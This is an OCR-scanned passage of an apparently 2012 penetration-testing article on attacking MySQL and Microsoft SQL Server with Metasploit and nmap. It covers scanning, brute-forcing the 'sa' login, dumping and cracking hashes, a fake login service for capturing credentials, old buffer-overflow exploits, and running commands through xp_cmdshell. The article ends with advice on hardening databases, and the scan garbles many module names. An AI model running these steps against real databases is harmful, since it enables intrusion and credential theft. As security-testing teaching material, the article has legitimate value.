mote user to login to MySQL, and then gain arbi- 
trary remote code execution under the context of 
'SYSTEM'. 

We are in! 

And now what? Metasploit offers two modules 
that will assist you to enumerate a MySQL ser- 
vice or execute sql queries. All you need is a val- 
id user-password pair, mysqi enum allows for sim- 
ple enumeration of MySQL Database Server and 
mysqi sqi allows for simple SQL statements to 
be executed against a MySQL instance. To select 
them, type: 

use auxiliary/ admin/my sql /my sql_enum 

and execute the command 

show options 

to get a list of available options (Figure 17). 
To use mysqi sqi execute (Figure 18): 

use auxiliary/ admin/mysql/mysql_sql 

and 

show options 

Attacking a Microsoft SQL Server 

Microsoft SQL Server (MSSQL) is a relational da- 
tabase management system (RDBMS) used to 




store, retrieve and manage information. As with 
many Microsoft's products, SQL Server has many 
security weaknesses. Let's start by identifying run- 
ning SQL servers on the network. 

Discover open MSSQL ports 

MSSQL is running by default on port 1433. To dis- 
cover SQL Server you can use either nmap or 
Metasploit's auxiliary module. 

The NMAP way 

To discover open MSSQL ports we execute the fol- 
lowing command: 

nmap -sT -sV -Pn -p 1433 192.168.200.133 

Usually administrators, when they need more than 
one instances of SQL server they run the second 
instance at port 1434. 

nmap -sT -sV -Pn -p 1433,1434 192.168.200.133 

Parameters: 

-sT: TCP connect scan 

-sV: Determine Service version information 

-Pn: Ignore Host discovery 

-p 1433,1434: Scan port 1433 and 1434 



Scanning the whole network 

nmap -sT -sV -Pn —open -p 1433,1434 192.168.200.0/24 

Parameters: 
EEESE22E 




Figure 17. mysql_enum module options 



Figure 19. mssql_ping module options 




Figure 18. mysql_sql module options 



Figure 20. mssql_ping module in action 
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-open: Show only open ports 
The Metasploit way 

Metasploit offers auxiliary module mssqi ping. 
This module discovers running MSSQL services. 
To use it, type: 

use auxiliary/ scanner/mssql/mssql_ping 

Type: 

show options 

for a list of available options (Figure 19). 

To discover all running MSSQL services on the 
net, set RHOSTS value equal to 192.168.200.0/24, 
assuming that your target network is in this range, 
increase threads value for a faster scanning and 
run the module (Figure 20). 

Brute forcing MSSQL 

Auxiliary module mssqi iogin is working in the 
same manner as mysqi iogin does. It will query 
the MSSQL instance for a specific username and 
password pair. The options for this module are: 
Figure 21. 

The default administrator's username for SQL 
server is sa. In the options of this module, you 
can specify a specific password, or a password 
list, a username list or a username-password list 
where usernames and passwords are separated 
by space and each pair is in a new line. Having set 
your options simply run the module and wait for 
your results! You can create your own password 




Figure 21.mssql_login options 




Figure 22. mssql_hashdump module 



list file, like we did in the first chapter where we 
used mysql login module. 

Dump MSSQL Password Hashes 

mssqi hashdump extracts the usernames and en- 
crypted password hashes from a MSSQL server 
and stores them for later cracking with jtr_mssqi_ 
fast. This module also saves information about 
the server version and table names, which can be 
used to seed the wordlist. The module is located 
in auxiliary/scanner/mssql. To use it set RHOSTS 
option to our target's ip address and increase 
THREADS value to 50. If you have managed to 
reveal root password then set also options USER- 
NAME and PASSWORD. Run the module! (Figure 
22). 

Cracking mssql passwords with John The 
Ripper 

Metasploit offers module jtr_mssqi_fast. This 
module works in the same manner as jtr_m yS qi_ 
fast does. It uses John the Ripper to identify 
weak passwords that have been acquired from the 
mssqi hashdump module. After having acquire ms- 
sql encrypted hashes with mssqi hashdump mod- 
ule, load jtr mssql fast and run it. 

use auxiliary/ analyze/ j tr_mssql_f ast 

and 

run 

You should set the Wordlist option which is the 
path to your desired password list (Figure 23). 

Getting Microsoft SQL Server schema 

Metasploit Offers the module mssql_schemadump 

to retrieve MSSQL schema, mssql schemadump 

iS located Under auxiliary/scanner/mssql. This 

module attempts to extract the schema from a 
MSSQL Server Instance. It will disregard builtin 
and example DBs such as master,model,msdb, 
and tempdb. The module will create a note for 




Figure 23. jtr_mssql_fast module options 
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each DB found, and store a YAML formatted out- 
put as loot for easy reading. To use it you have to 
set RHOSTS, USERNAME and PASSWORD op- 
tions. If you are scanning more than one hosts in- 
crease the THREADS value to get results faster. 

Phishing with MSSQL 

Metasploit has also a mssql capture module, called 
mssqi. This module provides a fake MSSQL service 
that is designed to capture MSSQL server authen- 
tication credentials. The module supports both the 
weak encoded database logins as well as Windows 
login (NTLM). To select the capture module type: 

use auxiliary/ 'server /capture /mssql 

You can set CAINPWFILE option to store cap- 
tured hashes in Cain&Abel format or JOHNPW- 
FILE to store hashes in John The Ripper format. 
Leave SRVHOST option as it is, 0.0.0.0, to listen 
on the local host. You can configure the module 
to use SSL (Figure 24). 

Run the module and connect to the capture ms- 
sql server from another computer on the network 
to see how it is working. To connect to a mssql 
server open your Microsoft SQL Server manage- 
ment studio and try to login to the running service 
(Figure 25). Metasploit has captured the username 
and the password the user entered to login to the 
fake MSSQL service. 



Exploiting the Microsoft world 

Metasploit offers some MSSQL exploits. Let's take 
a look. 




Figure 24. mssql capture module options 




Figure 25. Login attempt captured by mssql capture module 
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SQL Server 2000 

SQL server 2000 is a very old version of Micro- 
soft SQL Server and is hard to find it on Produc- 
tion environments nowdays. ms02_039_siammer 
exploits a resolution service buffer overflow. This 
overflow is triggered by sending a udp packet to 
port 1434 which starts with 0x04 and is followed by 
long string terminating with a colon and a number. 
To select it for use simply type: 

use exploit/ windows /mssql /ms02_0 3 9_slammer 

Another exploit module for SQL Server 2000 is 

ms02 _ 056 _ hello. ms02 _ 056 _ hello is an exploit 

which will send malformed data to TCP port 1433 
to overflow a buffer and possibly execute code on 
the server with SYSTEM level privileges. To se- 
lect it, type: 

use exploit /windows /mssql /ms02_0 5 6_hello 

SQL Server 2000 - SQL Server 2005 

ms0 9_004_sp_replwritetovarbin and ms0 9_004_ 
sp replwritetovarbin sqli exploit 3 heap-based 

buffer overflow that occur when calling the undoc- 
umented "sp_replwritetovarbin" extended stored 
procedure. This vulnerability affects all versions of 
Microsoft SQL Server 2000 and 2005, Windows 
Internal Database, and Microsoft Desktop Engine 
without the updates supplied in MS09-004. Micro- 
soft patched this vulnerability in SP3 for 2005. To 
use these exploits you type: 

use exploit /windows /mssql/msO 9_004_sp_ 
replwritetovarbin 

or 

use exploit /windows /mssql/msO 9_004_sp_ 
replwritetovarbin_sqli 

As with any Metasploit module, you can type 



show options 




Figure 26. ms09_004_sp_replwritetovarbin_sqli module 
options 
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to get a list of available options (Figure 26). 
Type 

show payloads 

to get a list of available of payloads for the select- 
ed exploit. 

SQL Server database systems 

Metasploit offers the module, exploit/windows/ 
mssqi/mssqi payioad, which executes an arbitrary 
payload on a Microsoft SQL Server by using the 
"xp_cmdshell" stored procedure. Three delivery 
methods are supported. The original method uses 
Windows 'debug.com'. Since this method invokes 
ntvdm, it is not available on x86_64 systems. A 
second method takes advantage of the Command 
Stager subsystem. This allows using various tech- 
niques, such as using a TFTP server, to send the 
executable. By default the Command Stager uses 
'wcsript.exe' to generate the executable on the tar- 
get. Finally, ReLIK's latest method utilizes Power- 
Shell to transmit and recreate the payload on the 
target. 

Another interesting exploit module that can be 
applied in all SQL Server versions is the exploit/ 

windows/mssql/mssql_payload_sqli. This module 

will execute an arbitrary payload on a Microsoft 
SQL Server, using a SQL injection vulnerability. 
Once a vulnerability is identified this module will 
use xp cmdsheii to upload and execute Metasploit 
payloads. It is necessary to specify the exact point 
where the SQL injection vulnerability happens. You 
should use a "reverse" payload on port 80 or to any 
other outbound port allowed on the firewall. 




Figure 27. mssql_sql_file module options 




Figure 28. mssql_findandsampledata module options 



From inside 

Metasploit offers various modules that will assist 
you to enumerate a MSSQL service, execute sql 
queries, retrieve useful data and many more. All 
you need is a valid user-password pair, mssqi enum 
will perform a series of configuration audits and se- 
curity checks against a Microsoft SQL Server data- 
base, mssql sql and mssql sql file will allow for 
simple SQL statements to be executed against a 
MSSQL/MSDE or multiple SQL queries contained 
within a specified file. To select them, type: 

use auxiliary/ admin /ms sql /mssql_enum 

or 

use auxiliary/ admin /ms sql /mssql_sql 

or 

use auxiliary/ admin/mssql/mssql_sql_file 

and execute the following command to see the 
options (Figure 27) 

show options 

Sample Data 

There is an amazing module called mssqi_ 
f indandsampledata. This module will search 
through all of the non-default databases on the 
SQL Server for columns that match the keywords 
defined in the TSQL KEYWORDS option. If col- 
umn names are found that match the defined key- 
words and data is present in the associated tables, 
the module will select a sample of the records from 
each of the affected tables. You have to set the the 
sample size by configuring the sample size option. 
Your results will be stored in CSV format. Type 

use auxiliary/ admin/mssql/mssql_findandsampledata 

and 



show options 




Figure 29. mssqljdf module options 
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Executing Windows Commands 

If you have managed to find a valid username - 
password pair, the most desired thing that you 
would like to do is to execute a command on the 
compromised machine. Metasploit offers module 

auxiliary/admin/mssql/mssql_exec Which Will 6X- 

ecute a Windows command on a MSSQL/MSDE 
instance via the xp_cmdshell procedure. All you 
need is the username and password!! 

Data mining 

If you need to search for specific information in 
SQL Server databases there is a module that can 
make your life easier. Its name, mssqi idf, and 

you will find it under auxiliary/admin/mssql/. This 

module will search the specified MSSQL server 
for 'interesting' columns and data. The module is 
working against SQL Server 2005 and SQL Server 
2008 (Figure 29). 

Conclusion 

Databases are the most important part of today's 
computing systems. They usually contain all the 
information needed to run a company or organi- 
zation. Therefore it is necessary to be as safe as 
possible. Metasploit framework is just one tool of 
many out there, that offers the appropriate scripts 



to compromise a database system. Databases are 
software that must be accessed by applications 
running on the Internet, that's why they must be 
guarded by firewalls, use encryption and power- 
full passwords and the whole system (database 
and operating system) must be checked every day 
for new updates and upgrades. The best choice 
would be to allow access to your database only 
from your intranet and/or vpn. Try not to expose 
your database directly to the web. Close all your 
database system ports now! 
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OWASP AppSec USA 2012 
Hyatt Regency, Austin TX 

Training (October 23-24, 2012) 

$750 for 1-day courses 
$1500 for 2-day courses 

Conference (October 25-26, 2012) 

$595 (10% off with HACKIN9 code) 
www.appsecusa.org 

Are you aware of the latest 
in Application Security? 

OWASP AppSec conferences bring 
together industry, government, security 
researchers, and practitioners to discuss 
the state of the art in application security. 

This series was launched in the United 
States in 2004 and Europe in 2005. 
Global AppSec conferences are held 
annually in North America, Latin America, 
Europe, and Asia Pacific. 
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